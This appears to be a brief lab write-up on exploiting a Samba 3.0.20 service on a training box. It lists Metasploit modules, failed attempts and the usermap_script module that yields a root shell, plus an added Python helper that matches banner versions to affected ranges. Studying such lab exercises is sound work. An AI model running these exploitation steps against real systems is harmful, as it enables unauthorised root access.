10.10.10.3
Scan
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Linux OS
This training box should be easy; I have done this kind of thing before:
Port 139: smbclient
Kioptrix box (Samba on port 139)
Service version identified:
Samba 3.0.20-Debian
Attempt 1
locate exploits/linux/remote/9950.rb
[*] exec: locate exploits/linux/remote/9950.rb
/root/exploit-database/exploits/linux/remote/9950.rb
/usr/share/exploitdb/exploits/linux/remote/9950.rb
msfconsole
search -h
search platform:linux type:exploit samba
Name                                        Disclosure Date  Rank       Check  Description
exploit/linux/samba/chain_reply             2010-06-16       good       No     Samba chain_reply Memory Corruption (Linux x86)
exploit/linux/samba/is_known_pipename       2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
exploit/linux/samba/lsa_transnames_heap     2007-05-14       good       Yes    Samba lsa_io_trans_names Heap Overflow
exploit/linux/samba/setinfopolicy_heap      2012-04-10       normal     Yes    Samba SetInformationPolicy AuditEventsInfo Heap Overflow
exploit/linux/samba/trans2open              2003-04-07       great      No     Samba trans2open Overflow (Linux x86)
exploit/multi/samba/nttrans                 2003-04-07       average    No     Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
use exploit/linux/samba/setinfopolicy_heap
show options
show options lists the Exploit target: 2:3.5.11~dfsg-1ubuntu2 on Ubuntu Server 11.10. This module's target does not match our version, so back.
Importing the exploit into msf as a module
cd /root/.msf4/modules/exploits/
mkdir samba3.0.21-3.0.24
cd samba*
cp /root/exploit-database/exploits/linux/remote/9950.rb .
Restart msfconsole and search samba3
Then I suddenly noticed that the target version does not seem to meet the condition: this exploit is for Samba 3.0.21-3.0.24.
ORZ, too careless.
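The version check that the detour above skipped, as an added example that is not part of the original writeup: a small triage helper that parses a Samba banner such as the one found by the scan and reports which of the affected-version notes recorded on this page cover it. The ranges are transcribed from this page's notes only (9950.rb: 3.0.21-3.0.24; the remote heap overflow: below 3.0.20; usermap_script: the 3.0.20 search hit), not from the advisories, and the labels are constructed here.

```python
"""Version-range triage for Samba banners (added example, not from the writeup).

Turns a banner such as "Samba 3.0.20-Debian" into a comparable version tuple
and checks it against the affected ranges noted on this page. Useful for
patch prioritisation from inventory data; the bounds below are taken only from
the page's own notes and must be confirmed against the real advisories.
"""
import re
from typing import List, Optional, Tuple

Version = Tuple[int, int, int]

# (label, inclusive lower bound, exclusive upper bound); None = unbounded.
# Labels are constructed for this example; bounds follow the page's notes.
AFFECTED = [
    # EDB 9950: "samba3.0.21-3.0.24", inclusive at both ends
    ("EDB-9950 (3.0.21-3.0.24)", (3, 0, 21), (3, 0, 25)),
    # "Samba < 3.0.20 - Remote Heap Overflow"
    ("Remote Heap Overflow (< 3.0.20)", None, (3, 0, 20)),
    # usermap_script, located by searching for the exact version 3.0.20
    ("usermap_script (3.0.20)", (3, 0, 20), (3, 0, 21)),
]


def parse_samba_version(banner: str) -> Optional[Version]:
    """Extract major.minor[.patch] from a banner; None if no exact version."""
    m = re.search(r"(\d+)\.(\d+)(?:\.(\d+))?", banner)
    if not m:
        # e.g. nmap's "Samba smbd 3.X - 4.X" carries no exact version,
        # which is exactly why a follow-up fingerprint is needed.
        return None
    return tuple(int(g) if g is not None else 0 for g in m.groups())


def matching_notes(banner: str) -> List[str]:
    """Return the labels whose version range covers the banner's version."""
    v = parse_samba_version(banner)
    if v is None:
        return []
    hits = []
    for label, lo, hi in AFFECTED:
        if lo is not None and v < lo:
            continue  # below the inclusive lower bound
        if hi is not None and v >= hi:
            continue  # at or above the exclusive upper bound
        hits.append(label)
    return hits
```

Tuple comparison does the ordering, so 3.0.20 is correctly rejected by the 3.0.21-3.0.24 range that the writeup initially tried.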
Attempt 2:
Samba < 3.0.20 - Remote Heap Overflow
The exploit is C code that has to be compiled and run, and its comments are in Italian...
Attempt 3:
Google search for Samba 3.0.20
https://www.rapid7.com/db/modules/exploit/multi/samba/usermap_script
exploit/multi/samba/usermap_script
After running it, I got a root shell directly.